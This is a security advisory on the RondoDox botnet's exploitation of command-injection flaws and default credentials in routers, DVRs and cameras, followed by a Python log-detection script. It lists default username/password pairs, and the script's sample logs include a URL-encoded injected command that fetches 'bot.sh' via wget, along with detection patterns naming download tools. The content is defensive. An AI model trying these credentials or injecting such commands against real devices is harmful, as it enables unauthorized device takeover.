
RondoDox botnet exploits 50+ flaws across 30 vendors in active campaign

Written by Field Effect Security Intelligence Team | Oct 10, 2025 7:04:20 PM

Researchers reported on October 9, 2025 that the RondoDox botnet is exploiting 50+ flaws in internet-facing devices across more than 30 vendors. The campaign targets routers, digital video recorders, network video recorders, closed-circuit television systems, and web servers. After gaining shell access, the botnet drops multi-architecture payloads derived from Mirai and Morte malware families.

The first observed exploitation occurred on June 15, 2025, when researchers detected the use of CVE-2023-1389. This command injection flaw in TP-Link Archer AX21 routers was originally disclosed during Pwn2Own Toronto 2022.

By September 22, 2025, three months after the first observed exploitation, researchers noted a spike in exploitation activity. Shortly after, on September 25, researchers confirmed a loader-as-a-service model distributing RondoDox alongside Mirai variants. This infrastructure enables rapid deployment and rotation of payloads, increasing persistence and detection evasion.

RondoDox focuses primarily on command injection vulnerabilities, accounting for 50 of the 56 known flaws. Several of these have been added to the Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities (KEV) catalog.

The vulnerabilities listed affect devices from a wide range of vendors commonly used in small office and home office environments. These include TP-Link, D-Link, Cisco, Tenda, Dasan, Netgear, Linksys, ZyXEL, Apache, and vendors using GNU Bash in embedded systems. Many of the flaws were targeted due to widespread deployment and inconsistent patching practices.

Researchers also noted that the RondoDox botnet takes advantage of devices with weak or default credentials. Examples include combinations such as:

  • admin:admin
  • admin:password
  • admin:1234
  • admin:123456
  • ffadmin:ffadminff
  • root:icatch99

These credentials are commonly found on internet-exposed routers, digital video recorders, and surveillance systems, making them attractive entry points for automated exploitation.

Analyst insight

Organizations with internet-exposed devices are at elevated risk. Small office and home office networks or enterprise edge environments are especially vulnerable due to the prevalence of consumer-grade hardware and limited patching cycles.

To reduce exposure, organizations are advised to:

  • Apply vendor patches for all vulnerabilities listed in the KEV catalog.
  • Disable remote management interfaces and restrict access to trusted IP ranges.
  • Segment networks to limit lateral movement and isolate vulnerable devices from critical infrastructure.
  • Monitor for post-exploitation indicators such as shell commands, payload fetch attempts, and known malicious user agents.
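The indicators named in the last bullet, together with the default-credential pairs listed earlier, can be turned into simple detection logic for device auth logs and web-server access logs. The following Python is an added example, not Field Effect's detection logic and not derived from any RondoDox sample; the log lines, the log formats, the example user-agent blocklist entry and the thresholds are all constructed for this example and should be adapted to the formats your edge devices actually emit.

```python
"""Detection sketch for the post-exploitation indicators named above:
default-credential login attempts, payload fetch attempts in request
strings, and known bad user agents. Added example; the log lines and
formats below are constructed, not taken from real devices."""
import re
from collections import Counter
from urllib.parse import unquote

# Usernames taken from the credential pairs quoted in the advisory.
DEFAULT_USERS = {"admin", "root", "ffadmin"}

# Placeholder blocklist entry, constructed for this example (not a real IoC).
BAD_USER_AGENTS = {"Example-Bad-UA/1.0"}

# Download tooling commonly seen in injected payload-fetch commands.
FETCH_TOOLS = re.compile(r"\b(wget|curl|tftp|ftpget|busybox)\b", re.IGNORECASE)
# Shell metacharacters that do not belong in a benign query parameter.
SHELL_META = re.compile(r"[;|`]|\$\(|&&")

# Assumed syslog-style login record: "<ts> <host> login: FAILED|ACCEPTED login for <user> from <ip>"
AUTH_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) login: (?P<result>FAILED|ACCEPTED) login for "
    r"(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3})$"
)
# Assumed combined-format web access record.
ACCESS_RE = re.compile(
    r'^(?P<src>\d{1,3}(?:\.\d{1,3}){3}) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample input using documentation (TEST-NET) addresses.
SAMPLE_LOGS = [
    "2025-10-09T10:01:02Z dvr01 login: FAILED login for admin from 203.0.113.7",
    "2025-10-09T10:01:03Z dvr01 login: FAILED login for admin from 203.0.113.7",
    "2025-10-09T10:01:04Z dvr01 login: FAILED login for admin from 203.0.113.7",
    "2025-10-09T10:01:05Z dvr01 login: ACCEPTED login for root from 203.0.113.7",
    "2025-10-09T10:01:30Z dvr01 login: ACCEPTED login for jsmith from 198.51.100.4",
    '198.51.100.4 - - [09/Oct/2025:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Oct/2025:10:02:05 +0000] "GET /cgi-bin/status?iface=eth0%3Bwget%20http%3A%2F%2F192.0.2.9%2Fbot.sh HTTP/1.1" 200 0 "-" "Example-Bad-UA/1.0"',
    '203.0.113.7 - - [09/Oct/2025:10:02:06 +0000] "GET /cgi-bin/status?iface=eth0%3Bid HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]


def detect_credential_attacks(lines, fail_threshold=3):
    """Flag a source once it reaches fail_threshold failed logins against a
    default username, and flag any later accepted login with a default
    username from that same source (likely a guessed default credential)."""
    fails = Counter()
    alerts = []
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        user, src, result = m["user"], m["src"], m["result"]
        if result == "FAILED" and user in DEFAULT_USERS:
            fails[src] += 1
            if fails[src] == fail_threshold:  # alert once, at the threshold
                alerts.append({"type": "default-credential-bruteforce", "src": src, "user": user})
        elif result == "ACCEPTED" and user in DEFAULT_USERS and fails[src] > 0:
            alerts.append({"type": "default-credential-success", "src": src, "user": user})
    return alerts


def detect_payload_fetch(lines):
    """Decode each request path and flag shell metacharacters, download
    tooling in the request string, and blocklisted user agents."""
    alerts = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        decoded = unquote(m["path"])  # attackers URL-encode the injected command
        reasons = []
        if SHELL_META.search(decoded) and FETCH_TOOLS.search(decoded):
            reasons.append("payload-fetch-in-request")
        elif SHELL_META.search(decoded):
            reasons.append("shell-metacharacters-in-request")
        if m["ua"] in BAD_USER_AGENTS:
            reasons.append("known-bad-user-agent")
        if reasons:
            alerts.append({"src": m["src"], "path": decoded, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_credential_attacks(SAMPLE_LOGS) + detect_payload_fetch(SAMPLE_LOGS):
        print(alert)
```

Both detectors are deliberately format-specific: the value of this kind of monitoring comes from matching the exact log shape of each exposed device class (router, DVR, NVR, camera, web server), and a success-after-failures rule for default usernames is a much stronger signal than either event on its own.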

Regular vulnerability assessments and configuration audits are recommended to identify exposure and enforce security baselines. Where patching is not feasible, replacing unsupported hardware and limiting internet exposure can reduce risk.

Field Effect MDR protects against threats like RondoDox by continuously monitoring for and rapidly detecting activity such as command injection attempts, unauthorized shell access, and payload delivery associated with botnets.

Field Effect MDR regularly updates detection logic and blocks malicious domains, payload fetch attempts, and known botnet infrastructure. With 24/7 expert oversight, threats are not only detected but also contained and neutralized in real time. This is especially critical for environments with exposed edge devices, where botnets often gain initial access.